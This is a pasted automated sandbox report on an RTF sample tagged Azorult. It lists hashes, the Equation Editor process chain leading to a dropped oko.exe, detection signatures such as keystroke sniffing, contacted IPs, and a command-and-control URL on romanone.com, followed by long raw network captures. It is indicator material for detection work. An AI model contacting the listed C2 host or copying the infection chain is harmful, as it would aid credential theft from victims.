paladin316

RTF_b54f6f81c118db266fa3d82ca27a9312_doc_2019-08-30_02_30.txt

Aug 30th, 2019
  1.  
  2.  
  3. * MalFamily: "Azorult"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "RTF_b54f6f81c118db266fa3d82ca27a9312.doc"
  8. * File Size: 8538
  9. * File Type: "Rich Text Format data, version 1, unknown character set"
  10. * SHA256: "7e6d04a02911f357032f250c91ee5efd90634728d8c1bab5b1e170e30350ad84"
  11. * MD5: "b54f6f81c118db266fa3d82ca27a9312"
  12. * SHA1: "ec4290119e47c92b1c889c1f447d7656ac03043f"
  13. * SHA512: "6ece06df00729e8a6cf0a9b2cc93d0407948fc1f6c5b2c8e14817003d096fe561c30acba6876d983e8b0907910a5f330cd80cf79154b43461c336ac6a730833e"
  14. * CRC32: "B95B7451"
  15. * SSDEEP: "96:F7BK+vc3OPGasDdZDzOkrXTXTyLAFid2R/nignUv1g+Ax7F:fKec3G69zxoUxngg+Axp"
  16.  
  17. * Process Execution:
  18. "WINWORD.EXE",
  19. "svchost.exe",
  20. "EQNEDT32.EXE",
  21. "oko.exe",
  22. "oko.exe",
  23. "WmiPrvSE.exe",
  24. "explorer.exe",
  25. "WMIADAP.exe"
  26.  
  27.  
  28. * Executed Commands:
  29. "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding",
  30. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  31. "\"C:\\Users\\user\\AppData\\Roaming\\oko.exe\""
  32.  
  33.  
  34. * Signatures Detected:
  35.  
  36. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  37. "Details":
  38.  
  39.  
  40. "Description": "The RTF file contains embedded content",
  41. "Details":
  42.  
  43. "embedded content": "Object 2 index 00000032h contains embedded object RgPdTp9y6HGmSEP with size 4096 bytes"
  44.  
  45.  
  46.  
  47.  
  48. "Description": "Possible date expiration check, exits too soon after checking local time",
  49. "Details":
  50.  
  51. "process": "EQNEDT32.EXE, PID 2276"
  52.  
  53.  
  54.  
  55.  
  56. "Description": "Attempts to connect to a dead IP:Port (9 unique times)",
  57. "Details":
  58.  
  59. "IP": "52.109.20.1:443"
  60.  
  61.  
  62. "IP": "52.109.20.4:443"
  63.  
  64.  
  65. "IP": "23.60.72.96:443"
  66.  
  67.  
  68. "IP": "151.139.128.14:80"
  69.  
  70.  
  71. "IP": "40.91.122.234:443"
  72.  
  73.  
  74. "IP": "72.21.91.29:80"
  75.  
  76.  
  77. "IP": "163.44.207.86:443 (Vietnam)"
  78.  
  79.  
  80. "IP": "104.18.25.243:80"
  81.  
  82.  
  83. "IP": "23.64.189.123:443"
  84.  
  85.  
  86.  
  87.  
  88. "Description": "Performs HTTP requests potentially not found in PCAP.",
  89. "Details":
  90.  
  91. "url": "romanone.com:443//wp-content/okoye/32/index.php"
  92.  
  93.  
  94.  
  95.  
  96. "Description": "A process created a hidden window",
  97. "Details":
  98.  
  99. "Process": "oko.exe -> C:\\Users\\user\\AppData\\Roaming\\oko.exe"
  100.  
  101.  
  102.  
  103.  
  104. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  105. "Details":
  106.  
  107. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  108.  
  109.  
  110. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  111.  
  112.  
  113. "http_version_old": "HTTP traffic uses version 1.0"
  114.  
  115.  
  116. "suspicious_request": "http://romanone.com:443/wp-content/okoye/32/index.php"
  117.  
  118.  
  119.  
  120.  
  121. "Description": "Performs some HTTP requests",
  122. "Details":
  123.  
  124. "url": "http://romanone.com:443/wp-content/okoye/32/index.php"
  125.  
  126.  
  127.  
  128.  
  129. "Description": "The RTF file has an unknown character set",
  130. "Details":
  131.  
  132.  
  133. "Description": "Sniffs keystrokes",
  134. "Details":
  135.  
  136. "SetWindowsHookExW": "Process: explorer.exe(2004)"
  137.  
  138.  
  139.  
  140.  
  141. "Description": "A document file initiated network communications indicative of a potential exploit or payload download",
  142. "Details":
  143.  
  144. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\x1e\\x0fo\\xafaq\\xf3\\\\xeas\\x1e3\\xe6\\x9c\\x08\\x1c\\x05\\x185dqs\\x91\\x17\\xfej\\x84>i\\x14\\xd8\\x16\\xef\\xee8\\xe1x\\x17v\\xd0\\x15\\x91-\\xe4p\\x96\\x17q,\\x99/\\xe6\\x9a#x\\xbdsdr9\\xf4\\x1a\\x19cd\\x89\\xae\\xf3\\xf4\\x91\\x9d\\x14b-?\\xc3\n\\xffr\\xf1\\xc8|t\\x08u\\x03s\\xce\\xac\\x98\\x0f9\\xa7\\xb8x\\x97\\x0b-\\xa8\\x11\\xbe\\x12\\xdbp\\xa6cd\\x13)`\\xc4>\\xc3\\xa1\\x86i\\xf7\\x86\\x8b\\xc1\\xc8.\\x95j\\x04\\xee\\xdf\\x11\\x88\\x87\\xc2hw\\xfdl+>\\x1bs,m?\\xa6\\x17\\xf8\\xcfm'&\\xe7~\\xaf\\x9d\\x17lg\\xb7\\x0e\\x18 \\xffdd6\\xd4\\x94\\xaf\\xb3\\xb9g2\\xc7\\x14\\xf9\\x92\\x98s*\\xd1\\x83v\\x1f\\xc3\\x97\\x1e\\x7f\\xd3\\xae^\\x1a\\xe8\\xe6\\xbc\\xc2w\\xcd\\xd7\\xaf\\xbbn_\n\\x8c\\x83 \\xc9v\\x10\\xc9\\xa8w\\x0f\\xb5\\xfa(j\\x8e\\x04\\xf8\\xd3\\xc9\\xda&\\x0bwc\\xd4\\xda&\\xf4\\xfd\\xab\\xe2\\xae\\xd0\\xbdv\\xcf\\x12|t\\xfb?\\xc3\\xd7f\\x01"
  145.  
  146.  
  147. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00~\\x01\\x00\\x00z\\x03\\x01h\\x81m\\x90u\\xa3\\xc8\\x11\\xbc\\xd4n'\\xc2\\xd7\\xf7m'<.\\xf6gmb2\\xd5`\\xa1\\x90z\\x06\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x009\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00 \\x00\\x1e\\x00\\x00\\x1broaming.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  148.  
  149.  
  150. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x04jd~\\x80\\x9c\\x03\\xc0\\xd6$x\\xdf\\xa6\\xf2tmj6o\\xd9\\x100\\x112\\xe2\\x90;\\xc6\\x17rro\\xcb\\x97\\xec\\x80f\\x0f8\\xc6_nc=_j\\x0eb\\xb6\\xe2$\\xd4\\xfb\\xc2s\\xc3\\xccf\\xfbk\\xa08\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000w\\xb5\\xae\\xce\\x8f\\x9c'\\x03t\\xb0z8\\x88\\x1cv\\xbfd7\\x8f\\xa2_r\\xe7m\\xf4\\x1ez\\xe0l\\xb62\\x11\\xbd`7\\xfb\\x9ej\\x90t\\xd2qe\\x9f\\xc6\\x8d\\xc36"
  151.  
  152.  
  153. "http_request": "winword.exe_WSASend_get /mfewtzbnmeswstajbgurdgmcgguabbtbl0v27rvz7lbduom%2fnyb45spuewqu5z1zmijhwmys%2bghunoz7oruetfaceai4elabvpzalrznpjlrv1u%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nuser-agent: microsoft-cryptoapi/6.1\r\nhost: ocsp.digicert.com\r\n\r\n"
  154.  
  155.  
  156. "http_request": "winword.exe_WSASend_get /mfqwujbqme4wtdajbgurdgmcgguabbrpc1vzt9qvn7bzy3iidtbhla4mkqquwiif1tycsck3fd7%2fhijo5ox%2f%2bn0ce3saagyvv14%2fmepdgh0aaaaabk8%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: sat, 23 mar 2019 17:46:18 gmt\r\nif-none-match: \"dd54d75d468"
  157.  
  158.  
  159. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\xf8\\x93\\xea\\xd7\\x9c\\xd9\\x96-\\x8c\\x98\\xb8\\x1b`\\xdf\\xde!\\xb5,;j\\x0c\\xfaiuk\\xbd\\x0b~\\xf3s\\x11\\xad\\x00\\xc0n\\xfd\\x0b<8\\x9b<a3\\xc4\\xd5\rr=s\\x9a\\x83\\x0e\\x831\\x12\\xb5\\xb7\\xf3=y\\xb2$\\xaec\\x10\\xf44\\xd9kv\\xda\\xbc\\xd1c\\x06\\x93m\\x9e7dl\\x8bd\\x14&\\x91\\xca4\r\\xbe0\\xb4\r\\xb3\\xdc6\\x15\\xdf\\x88\\xfe\\x82.\\xeb\\xbf\\xc9\\xb0yx\\x1e\\xd2\\xa0\\xe1\\xe3\\xf4\\x1c\\xb1\\xce\\xf4\\x1a\\x0e\\xde2\\x91\\xbc7\\x19\\x15fc`\\xdc\\xd0a\\x87\\x96\\x1d\\xb2%\\x16t\\xf9\\x17\\xc9\nse\\xfd\\xf5\\xaa\\xd7\\xf4g\\xf26\\xbf/-\\xf7 \\xc8\\x91\\xfd\\x91\\xb3i\\x00\\xf3k\\x0b\\xb4\\x15)\\xcd\\x05\\xc3t$\\x8f?y\\x08\\x0e\\x9c\"\\x19\\x1c\\xe2ke\\xf8i\\xb9\\xaez\\xd6\\x14=\\xa0\\x8f7\\x9aw\\x9a9\\x7f\\x86jo\\x1b0\\x97x\\xe7q\\xfe\\xc0`\\xa7\\x9b\\x08t\\xf1\\xd3\\x8d-j\\xd8\\x15:\\x1a\\xc3b>\\xd1\\xdc\\xa7\\x9ap\\xdb) `\\xcc_\\xc1"
  160.  
  161.  
  162. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x02 `\\xe4\\x1c\\xf3i\\xcck\\x93\\x11\\\\x86\\x8c\\x96\\x08\\x15\\xb2fs\\xb2\"\\xb0\\xbf\\xaf\\x03\\x83\\xa2/o\\xaa\\x8c\\xbd\\x9f\\xf1\\xabw\\xdd7\\xe8\\xdf\\\\x88\\x83\\x83\\xb4w\\x81c.\\xa5\\x1f\\x82\t\\x85\\xcd\\x9b,\\x8cb\\xaf\\xa7\\xa6w\\xa7\\xef\\xee\\xd1-pk>\\xa7\\xaen,\\xeb\\xbc\\x98,\\xa8\\xf3\\x9a\\x91\\x1dm\\x98\\x06!\\x02\\xcd\\x80p\\x92\\x125\\xa3\\x06\\xcc\\xc9\\xcfz\"ra\\xed\\oy!j\\xcfu\\x10@\t\\x01e\\xdd\\x03mb\\xab\\xb4-\\x8ab!\\xc6\\x98\\xd2\\xdbh\\x9a\\x18\\xf43\\x86frk\\x0eh\\x15\\x06\\x1303a.hms&lb\\x0ew\\xfc\rh.\\xa4\\x01+\\x0b\\xb8owqk\\x8d\\x97\\xe2\\x18\\xa6#gl\\x062\\x9a=5z\\xff \\x89r\\x83\\x0c\\xc0\\x19\\x9ab\\xa0\\xbcv\\x93\\xc04\\x07yy\\xcc\\xf3\"\\xb84\\xe9?+\\xb5j\\x9d\\x9aci\\xac\\xd6(\\xcau\\x17\\xb0\\x1b\\xfb\\x0e\\xd3\n\\xdd\\xbca\\x1e\\xb3j\\x8c\\xb1\\xa2\\x17\\xf6\\xe0\\xd5\\x14ua\\xab\\x0c"
  163.  
  164.  
  165. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00z\\x01\\x00\\x00v\\x03\\x01h\\x81\\x84f\\x1f\\xeb\\xae\\x0e\\x8du\\xbd\\x0fu\\x997\\xfd\\xdd>y\\xc3\\xcd,\\x1fmi\\xb9h\\xdb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x005\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1c\\x00\\x1a\\x00\\x00\\x17odc.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  166.  
  167.  
  168. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xba\\xbe\\xcevt\\xb2\\xf3\\xd9a\\x18\\xb5c*\\x8c\\x1d\\xbc\\x8d`\\xb5\\xa7e,m\\xca\\x92m\\xb1\\xea\\x90\\x94\\x1a\\xa7l-\\x88\\x82r\\xe3ic\\xb7\\x95\\xea\\xee\".bs\\xf2\\x08\\xdb\\x0c\\xb9tv\\xc3\\x90\\x04\\x1f \\xc6\\x82\\x00\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x1e\\xa2z!\\x92\\x9f\\xbe8\\xd9t\\x8fm\\x9d\\x83\\xfd\\xab\\xd9\\x80sv\\xecx\\x82\\xa1\\xfd\\xfb\\x0c\\xd5\\xc5\\x12.\\xcd\\xe3v\\x07\\x81\\xb1\\xee\\x80ss2\\x92\\xa9\\xbb\\xa5\\g"
  169.  
  170.  
  171. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\xb4\\xa6\\x15\\xbdf\\x8az\\x16\\x07o\\xcf\\xb5\\xde\\xd7\\x0f\\xe6\\xc4\\xd8>\\x14!hi\\xf2\\x04\\x0e\\x9c%\\xf0y\\xb7o\\xb1\\xc1|\\x0f\\xb2\\x99\\x9b\\xcex\\x04\\xa4\\x15\\xc9i\\xa8y\\xa9_\\x82bef\\xc8\\xf2m(\\x11\\x99^\\xc2\\xfdk\\x93\\xebt\\xc6g6\\x91/\r\\x92u\\xdcrr\\x0f\\xef|\\x9fas\\xd6)\\xb9\\xbd\\xeac\\xd0\\xcd\\xa8\\xde\\xd2\\xbdm\\xc4\\xf9o\\x00n\\x7f\\xd2x_\\xe5\\xcb\\xe2\\xb1#\\xf9\\xf4\\xc1c\\xa2\\x9as\\xb7s\\xbc\\x1f\\xa2\\x8a\\x0b\\x89\\x07\\x00\\xc7\\x0c\\xea\\x95\\x05\\xe5?\n\\x94\\xeb\\x98\\xe1\\xbd1&\\xf6\\x10\\xb3f\\xc1\\x93\\x9c!\\xc8\\x8b\\xc8\\xef\\x8as\\x82\\x9e\\xbf\\xd6\\xd1\\xbeg\\xfc\\x05\\x04\\xe0\\x14\\x7f4\\x12\\xb0\\x9fw\\xd5\\xc0qm\\xcbn\\xbbie;s;%\\xabt\\xde\\xb9\\xe9\\x84k\\x9csu\\x1e\\x1c\\xa4\\xaf\\xa8\\x9f\\x04\\x13\\xd6j\\x17\\x8azb\\xb9\\x97\\x1f\\xb8\\xf5\\x1c\\xbd\\xb8\\xce\\x90\\x93\\xb5\\xbc\\x9f\\x9f\\x84\\xb8\\xea\\x93\\x1a\\xcd\\xba\\x19\\x90~po\\xd7\\xb2\\xf4\\x03\\xe2\\x02\\xe3q\\x07\\x8a"
  172.  
  173.  
  174. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x7f\\x01\\x00\\x00\\x03\\x01h\\x81\\x8c\\x84\\x06\\x8f\\x17\\x8cr\\x8f\\xc1f!\\x9e\\xd5qu\\xc3\\xaa\\x96\\xe5dt\\xa30\\x00\\xd0\\x05\\xcdu\\xb7\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00:\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00!\\x00\\x1f\\x00\\x00\\x1cactivation.sls.microsoft.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  175.  
  176.  
  177. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04%+\\xb9\\xfc\\xe5\\xc8\\xcd\\xefr8\\xc0\\x8cv(n\\xd8\\xd1o\\xb1\\xedi\\xd2\\xdau\\xec\\xe1\\xb4m\\xbao\\xa3\\xc6\\xccc\\xaf\\x00\\x8f\\x84\\xdb\\xbeb\\xa2m\\x02\\x14vz\\xee\\xc6\\x1f\\xfb;i\\xe8\\x997f2b\\x0c4\\xe4\\x11\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000$na\\xed\\xfd\\x9d\\x87\\xbd5s\\x8b\\x07\\xd2%\\x08\\x80\\xc4)\\xd3\\xb4\\xf7\\xb9\\xb2>\\x99\\xe1\\x89\\xdf\\xd7m\\xf6(\\x1bh\\xfax\\x1d\\xb6w\\xcb\\x17#\\xbb\\xeerb\\xac"
  178.  
  179.  
  180. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01`\\x00\\xaf\\x15\\x84\\xea\\xfc\\xff\\xd2\\xa6\\xd8\\xe6\\xa0hz\\xcb+\\x13\\x1d\\xdb\\xf7.nq\\xf6?7z,o\\x10n\\xf4\\xa3\\xde1\\x1f\\x8f\\xb4\\xc0\\x9b\\xf1\\x8e\\xb2q\\x04\\x1d\\xdb\\x14`e|1\\xf7\n\\x90=\\x02i\\xf5r\\xbd6\\xe9\\xd79\\xd4\\x05\\xd6\\xc3%g\\x8e\\xfa4<~\\xf0\\x82.\\x06\\xbc\\x9dv\\xd5\\x14\\xb1p\\xe5\\xa0#\\xaf\\x07\\\\xcc\\x05\\xc3\\xa5\\xe3g|\\xf6\\xb9ow\\x184\\x18\\xc7\\x9f\\xbd(\\xbe\\xc0\\xee\\xf5\t\\xb6&?k?/tqlr\\x17\\x90\\xf8\\xf5@\\x98\\x81\\x1e\\xc0\\xe3\\x8e3np\\x8e\\x9e\\xd2j#\\x0e\\x10\\xe1p\\x8a\\xd7h\\xe4\\xe8\\xb4\\xf5\\x9b\\x9e\\xb0\\x03d\\xdf\\x8f\\xee\\x87n\\xa5\\x82\\xb2\\x92co\\xfe\\x8a\\x925\\x99g|a\\xa0\\x82\\xd3\\x02\\xe5+h\\xf5p\\x88\\x8b\\xfa\\x1c+*\\xcfp\\xb1\\xf0\\xe8\\x01\\xda\\xc9\\xd5\\xc4\\xdd\\xe3\\x909\\x84yl\\x93\\x05\\x03\\xe4:\\xb7\\xd3\\x9a\\xf2\\xe9\\xb2\\x1f+38n\\x16\\x92\\x08\\x16\\x95\\xc90\\xbd\\x0b\\x15\\x83\\x97\\xa0\\xa7\\xa7\\xf9\\x91z\\xdf"
  181.  
  182.  
  183. "http_request": "winword.exe_WSASend_\\x17\\x03\\x019p\\x99\\xff\\xa8\\x86\\xdeq&\\x0b\\xf95\\xbf\\x83\\xc7\\x7f-c\\\\xce\\xbc\\xa1k\\xc4o\\xa54?\\xd1\\xc0\\x12 8`w\\xe8'\\xbc\\xee\\x10\\x1e\\xc7!\\xa1\\x90\\x0b\\x07d4\\xb9\\x9f\\xef\\xe7+\\x82\\xce\\xdd\\xadrh\\xb9\\xcc~i\\xf9<+\\x83/\\x9ei\\x07\\x8ey\\xef\\x8c\\xe3\\xbdy8i\\x99\\xf2\\x13\\xc2\\x04z\\xb8\\xc5\\xf8js\\xf9\\xc5\\xcen\\x18\\x86\\x03\\x13\\xf5\\xa2\\xea>\\\\x83y\\x0c>=\\xbd\\x0f\\xab\\xa3*n\\xf9\\x832|\\x8a_\\x90uh&\\xac\\xaf\\xb8\\xd15\\xc2\\xb3\\x0b\\xbb*a\\xfa^\\x80\\x96o\\x7fh\\xc51\\xber\\x10\\xf2\\xebt\\x08l\\xef\\xae\\xa8\\x9f\\x00\\xbf\\xf1\\x1a\\x9b\\xe3k\\x844\\xa6\\x93\\xff\\xe3\\xb5\\x0cj\\x89\\xa4\\xb6i\\xec\\x82\\xbf\\x93'\\x8ch\\xcan\\xbd7\\x98\\xe3\\x8c=\\xd8\\xd1i2\\xc3\\xe8\\x19\\xb1\\x93\\xcbn\\xd2b\\xd6\\x15&\\x85\\x96w\\xc6\\xe6\\xdd\\xa3\\xa9c\\xe7c\\xd7\\xf1\"\\xac\\xe4\\x92\\xde\\\\x98\\xf18\\xb9\\x8e\\xa0a5+33\\x86,\\x01\\xc4r\\xdcvtq\\x12h\\xf8."
  184.  
  185.  
  186. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x01\\x00\\x00y\\x03\\x01h\\x81\\x91\\x07m\\xc9<\\xde\\xd2<\\x9b\\xc2\\x8fh#\\\\x9f\\xb1\\xe2\\x91`\\x1a\\xba\\xdd,b\\xf4j\\x15\\x14\\xee\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x008\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1f\\x00\\x1d\\x00\\x00\\x1atemplateservice.office.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  187.  
  188.  
  189. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x862\\xd4\\x9b\\x99_\nqq\\xfe\\x00\\xed# r\\xf0\\xfb\\x17\\x93\\x9f\\xa0\\x0f\\xae~r+\\x08\\xf4\\x8d\\xaeu\\xf9%\"\\xa8ah\\xf0\\x04+\\x1f\\xdap\\xc8\\xb5\\x03y\\xb5\\x91v\\xb8\\xbf\\xc3\\x95\\xe4jb\\x81\\x9c\\x9d\\x15\\xc9\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x89\\x05\r\\xa3\\xea\\x19\\x8a\\xfa\\xad\\xc9j\\x1c\\xedi\\xf0>\\xe5\\xb9\t\\x87q\\xbe\\xc2\\xbaj\\xee\\x85\\xf3\\xca\\x02bwg\\xa7s\\xe2p\\xb7\\x9c\\x91\\xack\\x9e\\xe7\\x13\\xf7|"
  190.  
  191.  
  192. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01plz4xo\\xf2wy\\xbfj2\\x14\\x8a\\xe4\\x01\\xc7\\xfd\\xf7\\x99\\x11\\xa3\\x9c\\xea\\x96\\xffo\\x92\\x82u\\xa6/\\x17\\xeac\\x96k\\x9d\\xba\\xa4@\\x16\\x91h\\x96x\\xe8^\\xbb\\xbc\\x0e\\xbb\\x98\\xe3\\xa0-\\xf5\\xe1\\xady\\x8ae\\x1d\\xdcd\\xe9\\xa7\\xffg\\xf41\\xae\\xf5\\xd5\\xd2\\xd6\\xe7\\xde\\x87\\xaa~;t\\x92y\\xf5nsvz9(6\\x87\\xebi jtry-\\xc8\\xd2\\xecjic\\x14\\xc3\\x04\\xc0\\xcd\\x13\"\\xcb\\xae\\xca\\xf2\\x867a\\x9d.2\\xb4\\x9c\\xfd\\x06\\x91\\xd7\\x03\\xdd\\xac\\xfa\\x0c\\xf0\\x94\\xc9\\x19\\x10\\xe9\\xb8\\x99\\xeb\\x85\\x9b\\x8b\\xd3=\\xd7\\x18\\x80(#\\xac9\\x93\\x08\\xc3!s\\xe9\\xe1^8\\xa3\\x94^\\xae\\xb0\\x00\\x83vj\\x86xzw\\x85\\x84\\xd8\\x8e\\xa96\\xd9k,\\x1a\\x11\\x03\\xbc\\xb3%\\xfdk\\x10\\xd8\\xfb.e9e\\x9d\\x00<@\\xb8r\\xa2\\xa3\\xac\\xbe\\xde\\xfc\\xc9\\x9fi\\xd67%p\\xd9\\xc8\\x08z\\xae\\xbc`\\xa9\\xc7\\xa5bwq\\xe4\\xf0\\x1f\\xbc\\xa1d\\x88\\xa8\\xd6r\\xee\\xecr"
  193.  
  194.  
  195. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x921\\x00\\xfaag<\\xca\\xb6\\xc0\\xf1\\x8d\\xbapq\\xfc\\x15\\x0f.gyq|h\\xb1\\x9a| \\x1e\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  196.  
  197.  
  198. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x83*'\\xcf\\xd6|\\x18 \\xde\\xe7g\\x1d|\\xff\\x1a\\xa2\\x89\\xe0\\xb6u\\x1e\\x89\\xf5;\\xf8\\x99\\x136\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  199.  
  200.  
  201. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92i\\x82,:\\xf1\\x11\\x8a\\x81\\xb7\\xd40\\xce\\xb5\\xdf\\xbc\\xa7j't\\xf7(\\x0e\\x98\\xa5\\x0f\\x9bl\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  202.  
  203.  
  204. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x05\\xa3\\xd1\\xdd\\x8b\\xa8\\xea\\x1d\\x9f\\xdf\\x0ct\\xc0\\x058s^1<\\xe6\\x08\\x17\\xf8r\\xb7\\x7f`\\xa9\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  205.  
  206.  
  207. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92?\\x85\\xe9x\\x15,\\xff\\x88\\x832\\xe0\\x92c\\x01\\x84\nn\\x11\\x05l9\\xebj\\xa8\\xd0\\x86\\xef\\xa2\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  208.  
  209.  
  210. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92x\\x9d\\xfa\\x0f\\x8c\\x1f+\\xbck\\x14n\\xdf\\xabc\\xe4x\\x1d\\xfd~42\\xc0\\x98\\x88\\xe6\\xeb\\x12\\x9b\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  211.  
  212.  
  213. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x920\\\\xa8\\x0c\\x85\\x86\\xb2\\x1f\\xc9\\x92\\x8b\\xc7\\x98\\xc6\\xbb\\xe7\\x0e%\t\\xd7\\x99j\\xe3-g\\xaf\\xa2\\xdc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  214.  
  215.  
